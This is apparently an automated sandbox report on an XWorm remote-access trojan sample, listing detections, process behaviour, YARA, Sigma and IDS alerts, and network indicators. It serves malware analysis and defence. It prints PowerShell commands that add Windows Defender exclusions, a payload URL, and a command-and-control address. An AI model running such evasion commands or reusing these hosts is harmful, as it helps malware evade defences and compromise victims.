Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1c8DbXc5r0.exe

Overview

General Information

Sample name:1c8DbXc5r0.exe
renamed because original name is a hash value
Original sample name:49aa60a3ee7d3b03d16aa591024cbbc7.exe
Analysis ID:1527586
MD5:49aa60a3ee7d3b03d16aa591024cbbc7
SHA1:ab7a4b389a7583370a53792852a819aa34d5d2e8
SHA256:e9f7edcb41000f0375515a01dae7d155723b8bbba28c7bae75c63e7d98fdedaa
Tags:32exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1c8DbXc5r0.exe (PID: 6444 cmdline: "C:\Users\user\Desktop\1c8DbXc5r0.exe" MD5: 49AA60A3EE7D3B03D16AA591024CBBC7)
    • powershell.exe (PID: 6656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1c8DbXc5r0.exeJoeSecurity_XWormYara detected XWormJoe Security
    1c8DbXc5r0.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8026:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\rapent.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\rapent.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8026:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8178:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8215:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x832a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x7e26:$cnc4: POST / HTTP/1.1
          Process Memory Space: 1c8DbXc5r0.exe PID: 6444JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.1c8DbXc5r0.exe.8d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.1c8DbXc5r0.exe.8d0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8378:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8415:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x852a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8026:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\1c8DbXc5r0.exe, ProcessId: 6444, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1c8DbXc5r0.exe", ParentImage: C:\Users\user\Desktop\1c8DbXc5r0.exe, ParentProcessId: 6444, ParentProcessName: 1c8DbXc5r0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe', ProcessId: 6656, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T04:51:08.553146+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:09.270583+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:21.674385+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:34.080889+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:38.569939+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:47.469232+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:58.893126+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:52:08.174794+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:52:08.576283+020028528701Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T04:51:09.272872+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              2024-10-07T04:51:21.676737+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              2024-10-07T04:51:34.085484+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              2024-10-07T04:51:47.470728+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              2024-10-07T04:51:58.895796+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              2024-10-07T04:52:08.175608+020028529231Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T04:51:08.553146+020028528741Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:51:38.569939+020028528741Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              2024-10-07T04:52:08.576283+020028528741Malware Command and Control Activity Detected147.185.221.1855624192.168.2.449738TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T04:51:08.980911+020028559241Malware Command and Control Activity Detected192.168.2.449738147.185.221.1855624TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 1c8DbXc5r0.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\rapent.exeAvira: detection malicious, Label: TR/Spy.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\rapent.exeReversingLabs: Detection: 89%
              Source: C:\Users\user\AppData\Roaming\rapent.exeVirustotal: Detection: 76%Perma Link
              Multi AV Scanner detection for submitted file
              Source: 1c8DbXc5r0.exeReversingLabs: Detection: 89%
              Source: 1c8DbXc5r0.exeVirustotal: Detection: 77%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\rapent.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 1c8DbXc5r0.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 1c8DbXc5r0.exeString decryptor: https://ser0xen.com/pl.txt
              Source: 1c8DbXc5r0.exeString decryptor: <123456789>
              Source: 1c8DbXc5r0.exeString decryptor: <Xwormmm>
              Source: 1c8DbXc5r0.exeString decryptor: XWorm V5.6
              Source: 1c8DbXc5r0.exeString decryptor: USB.exe
              Source: 1c8DbXc5r0.exeString decryptor: %AppData%
              Source: 1c8DbXc5r0.exeString decryptor: rapent.exe
              Source: 1c8DbXc5r0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 18.224.107.108:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: 1c8DbXc5r0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.18:55624 -> 192.168.2.4:49738
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.18:55624 -> 192.168.2.4:49738
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.18:55624
              Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49738 -> 147.185.221.18:55624
              Source: global trafficTCP traffic: 192.168.2.4:49738 -> 147.185.221.18:55624
              Source: global trafficHTTP traffic detected: GET /pl.txt HTTP/1.1Host: ser0xen.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 147.185.221.18 147.185.221.18
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pl.txt HTTP/1.1Host: ser0xen.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ser0xen.com
              Source: global trafficDNS traffic detected: DNS query: models-subscriptions.gl.at.ply.gg
              Source: powershell.exe, 00000001.00000002.1758314462.0000024B31650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: powershell.exe, 00000007.00000002.1982591730.000001355AF9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
              Source: powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1843415748.0000013EDD09E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ser0xen.com
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ser0xen.com/pl.txt
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 18.224.107.108:443 -> 192.168.2.4:49737 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 1c8DbXc5r0.exe, XLogger.cs.Net Code: KeyboardLayout
              Source: rapent.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

              Operating System Destruction

              barindex
              Protects its processes via BreakOnTermination flag
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess information set: 01 00 00 00 Jump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1c8DbXc5r0.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B888E520_2_00007FFD9B888E52
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8805B80_2_00007FFD9B8805B8
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8880A60_2_00007FFD9B8880A6
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B883F280_2_00007FFD9B883F28
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9630E94_2_00007FFD9B9630E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9530E911_2_00007FFD9B9530E9
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\rapent.exe E9F7EDCB41000F0375515A01DAE7D155723B8BBBA28C7BAE75C63E7D98FDEDAA
              Source: 1c8DbXc5r0.exe, 00000000.00000000.1666003464.00000000008DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecretiutfghtreg.exe4 vs 1c8DbXc5r0.exe
              Source: 1c8DbXc5r0.exeBinary or memory string: OriginalFilenamecretiutfghtreg.exe4 vs 1c8DbXc5r0.exe
              Source: 1c8DbXc5r0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1c8DbXc5r0.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 1c8DbXc5r0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: rapent.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1c8DbXc5r0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 1c8DbXc5r0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: rapent.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: rapent.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/20@2/2
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Roaming\rapent.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeMutant created: \Sessions\1\BaseNamedObjects\qrHUH9z9nk81LG5x
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
              Source: 1c8DbXc5r0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 1c8DbXc5r0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
